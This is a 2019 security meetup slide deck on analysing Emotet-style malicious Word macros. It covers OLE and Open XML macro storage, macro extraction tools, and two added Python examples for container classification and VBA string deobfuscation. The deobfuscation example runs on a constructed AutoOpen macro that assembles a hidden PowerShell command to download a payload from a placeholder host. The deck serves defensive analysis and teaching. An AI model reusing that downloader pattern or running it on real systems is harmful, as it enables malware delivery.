MALICIOUS WORD DOC ANALYSIS
Silicon Valley Cyber Security Meetup
October 2019
MALICIOUS WORD DOC ANALYSIS
EMOTET
▸ Attackers are actively using Word docs with obfuscated macros
▸ The macro runs a PowerShell script to download the main executable
HOW ARE MACROS STORED?
▸ MS Office 97-2003 documents
▸ Microsoft Compound File Binary (CFB), a.k.a. OLE (Object Linking and Embedding)
▸ Like a filesystem
▸ Consists of segments called streams
▸ The VBA storage contains the macro source code in compressed form
https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-doc/ccd7b486-7881-484c-a137-51170af7cc22
HOW ARE MACROS STORED?
▸ MS Office 2007+ documents
▸ MS Open XML format
▸ XML files in a ZIP archive
▸ Macros are stored in a binary OLE file within the ZIP archive called “vbaProject.bin”
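The two storage layouts above (a CFB/OLE compound file for 97-2003 documents, an OLE vbaProject.bin part inside the Open XML ZIP for 2007+) can be told apart by their magic bytes rather than by file extension. The following is an added Python example, not code from the slides and not part of oletools or oledump: it reads the fixed MS-CFB header fields from the spec linked above and looks for vbaProject.bin parts inside a ZIP package. The documents it runs on are constructed in the script (a bare CFB header and a tiny ZIP), not real samples.

```python
"""Classify a Word document by its container format and locate the macro storage.

Added example (not from the slides): the inputs below are constructed, not real documents.
"""
import io
import struct
import zipfile

# Both signatures are fixed by the respective specs (MS-CFB header, ZIP local file header)
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
ZIP_MAGIC = b"PK\x03\x04"


def ole_header_info(data: bytes) -> dict:
    """Parse the fixed-size MS-CFB header fields an analyst checks before walking the streams."""
    if len(data) < 512 or not data.startswith(OLE_MAGIC):
        raise ValueError("not a compound file")
    minor, major = struct.unpack_from("<HH", data, 0x18)                    # minor at 0x18, major at 0x1A
    byte_order, sector_shift, mini_shift = struct.unpack_from("<HHH", data, 0x1C)
    num_dir_sectors, num_fat_sectors, first_dir_sector = struct.unpack_from("<III", data, 0x28)
    return {
        "major_version": major,
        "little_endian": byte_order == 0xFFFE,
        "sector_size": 1 << sector_shift,        # 512 for version 3, 4096 for version 4
        "mini_sector_size": 1 << mini_shift,
        "fat_sectors": num_fat_sectors,
        "first_dir_sector": first_dir_sector,    # where the stream/storage directory starts
    }


def ooxml_macro_info(data: bytes) -> dict:
    """List vbaProject.bin parts inside an Open XML ZIP and check that each one is really an OLE file."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        macro_parts = [n for n in zf.namelist() if n.rsplit("/", 1)[-1].lower() == "vbaproject.bin"]
        # vbaProject.bin is itself a compound file; a part with that name and a different
        # signature deserves a closer look on its own
        parts_are_ole = bool(macro_parts) and all(zf.read(n).startswith(OLE_MAGIC) for n in macro_parts)
    return {"has_macros": bool(macro_parts), "macro_parts": macro_parts, "macro_parts_are_ole": parts_are_ole}


def classify_container(data: bytes) -> dict:
    """Decide which of the two storage layouts applies, by signature, never by extension."""
    if data.startswith(OLE_MAGIC):
        return {"container": "ole", **ole_header_info(data)}
    if data.startswith(ZIP_MAGIC):
        return {"container": "ooxml", **ooxml_macro_info(data)}
    return {"container": "unknown"}


# ---- constructed sample inputs (not real documents) ----

def build_fake_ole_header() -> bytes:
    """A minimal, well-formed version 3 CFB header with no sectors behind it (constructed for the demo)."""
    hdr = bytearray(512)
    hdr[0:8] = OLE_MAGIC
    # minor version, major version, byte order mark, sector shift (2^9 = 512), mini sector shift (2^6 = 64)
    struct.pack_into("<HHHHH", hdr, 0x18, 0x003E, 0x0003, 0xFFFE, 9, 6)
    # directory sector count, FAT sector count, first directory sector
    struct.pack_into("<III", hdr, 0x28, 0, 1, 1)
    return bytes(hdr)


def build_sample_docm() -> bytes:
    """An Open XML package carrying a word/vbaProject.bin part (constructed for the demo)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/vbaProject.bin", build_fake_ole_header())
    return buf.getvalue()


if __name__ == "__main__":
    print(classify_container(build_fake_ole_header()))
    print(classify_container(build_sample_docm()))
    print(classify_container(b"%PDF-1.4 not an office file"))
```

The header fields are the ones oledump and olemap work from: once you know the sector size and the first directory sector you can walk the FAT to the directory entries and find the VBA storage. For an Open XML file the ZIP listing alone tells you whether a macro part exists, which is why renaming a .docm to .docx changes nothing for an analyst.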
EXTRACT MACROS FROM WORD DOCS
▸ oledump: https://blog.didierstevens.com/programs/oledump-py/
python oledump.py DOC_NAME
▸ oletools: https://github.com/decalage2/oletools
sudo -H pip install -U oletools
▸ oleid: to analyze OLE files to detect specific characteristics usually found in malicious files.
▸ olevba: to extract and analyze VBA macro source code from MS Office documents (OLE and OpenXML).
▸ olebrowse: a simple GUI to browse OLE files (e.g. MS Word, Excel, PowerPoint documents), to view and extract individual data streams.
▸ olemeta: to extract all standard properties (metadata) from OLE files.
▸ oletimes: to extract creation and modification timestamps of all streams and storages.
▸ oledir: to display all the directory entries of an OLE file, including free and orphaned entries.
▸ olemap: to display a map of all the sectors in an OLE file.
EXTRACT CMD / POWERSHELL FROM VBA SCRIPT
▸ There is going to be a lot of:
▸ Unused benign code
▸ Junk code
▸ Obfuscation
▸ String replacements
▸ The PowerShell code will be the downloader
▸ Download URLs will be obfuscated
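To show what the string replacements and obfuscated download URLs look like once resolved, here is an added Python example (not from the slides, and not olevba's own deobfuscation): it folds VBA string concatenation, Chr(), StrReverse() and Replace() calls, chains variable assignments top to bottom until each variable is a plain literal, then flags the values that look like a command line or a URL. The macro it runs on is constructed for the demo with a placeholder host (example.invalid); it is not a real Emotet sample, and the junk assignment in it stands in for the unused code the slide mentions.

```python
"""Fold common VBA string obfuscation back into literals so the command line and URL can be read.

Added example (not from the slides); the macro at the bottom is constructed with a placeholder host.
"""
import re

# A VBA string literal; a doubled quote inside it stands for one quote character
STR = r'"((?:[^"]|"")*)"'
STR_NC = r'"(?:[^"]|"")*"'


def _lit(s: str) -> str:
    return '"' + s.replace('"', '""') + '"'


def _unlit(s: str) -> str:
    return s.replace('""', '"')


def _subst_vars(expr: str, env: dict) -> str:
    """Replace already-resolved variable names with their literal, but only outside string literals."""
    if not env:
        return expr
    names = re.compile(r"\b(" + "|".join(re.escape(n) for n in env) + r")\b", re.I)
    parts = re.split("(" + STR_NC + ")", expr)
    for i in range(0, len(parts), 2):            # even indices are the text between literals
        parts[i] = names.sub(lambda m: _lit(env[m.group(1).lower()]), parts[i])
    return "".join(parts)


def simplify(expr: str, env: dict) -> str:
    """Rewrite one VBA expression until no more string-building calls can be folded."""
    prev = None
    while expr != prev:
        prev = expr
        expr = _subst_vars(expr, env)
        expr = re.sub(r"\bChrW?\$?\((\d+)\)", lambda m: _lit(chr(int(m.group(1)))), expr, flags=re.I)
        expr = re.sub(r"\bStrReverse\(\s*" + STR + r"\s*\)",
                      lambda m: _lit(_unlit(m.group(1))[::-1]), expr, flags=re.I)
        expr = re.sub(r"\bReplace\(\s*" + STR + r"\s*,\s*" + STR + r"\s*,\s*" + STR + r"\s*\)",
                      lambda m: _lit(_unlit(m.group(1)).replace(_unlit(m.group(2)), _unlit(m.group(3)))),
                      expr, flags=re.I)
        expr = re.sub(STR + r"\s*[&+]\s*" + STR,         # "a" & "b" and "a" + "b" both concatenate
                      lambda m: _lit(_unlit(m.group(1)) + _unlit(m.group(2))), expr)
    return expr


ASSIGN = re.compile(r"^(?:Set\s+)?([A-Za-z_]\w*)\s*=\s*(.+)$")


def resolve_strings(vba: str) -> dict:
    """Walk the macro top to bottom and record every variable that resolves to a plain string."""
    env = {}
    for raw in vba.splitlines():
        line = raw.strip()
        if not line or line.startswith("'") or line.lower().startswith("rem "):
            continue                              # comments and blank lines carry nothing
        m = ASSIGN.match(line)
        if not m:
            continue
        name, rhs = m.group(1).lower(), simplify(m.group(2), env)   # VBA names are case-insensitive
        whole = re.fullmatch(r"\s*" + STR + r"\s*", rhs)
        if whole:                                 # only keep values that folded completely
            env[name] = _unlit(whole.group(1))
    return env


SUSPICIOUS = ("powershell", "cmd.exe", "wscript", "http")


def suspicious_strings(env: dict) -> dict:
    """Keep only resolved strings that look like a command line or a download location."""
    return {k: v for k, v in env.items() if any(s in v.lower() for s in SUSPICIOUS)}


# Constructed macro in the style the slides describe: junk code, split strings, Replace/Chr tricks.
# The host example.invalid is a placeholder, not an indicator from any real sample.
SAMPLE_VBA = """
Sub AutoOpen()
    ' unused variable and assignment, present only as noise
    Dim zq As Integer
    zq = 42
    Dim a1 As String, a2 As String, u As String, full As String
    a1 = Replace("pow3rsh3ll", "3", "e")
    a2 = a1 & Chr(32) & StrReverse("neddih w-")
    u = "http" & "://" & "example" & Chr(46) & "invalid" & "/payload.bin"
    full = a2 & " -c " & "Invoke-WebRequest " & u
    Shell full, vbHide
End Sub
"""

if __name__ == "__main__":
    for name, value in suspicious_strings(resolve_strings(SAMPLE_VBA)).items():
        print(f"{name} = {value!r}")
```

Static folding of this kind only covers the patterns it knows about; values computed at run time, pulled from form fields or document properties, or built through functions the folder does not model stay unresolved, which is why the deck moves on to the VBA debugger. For triage the useful output is the set of fully resolved strings (the command line and the URL), which go straight into detection content and blocklists.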
LIVE DEMO
USING DEBUGGER
▸ Microsoft Visual Basic for Applications Editor
LIVE DEMO
ANY QUESTIONS?
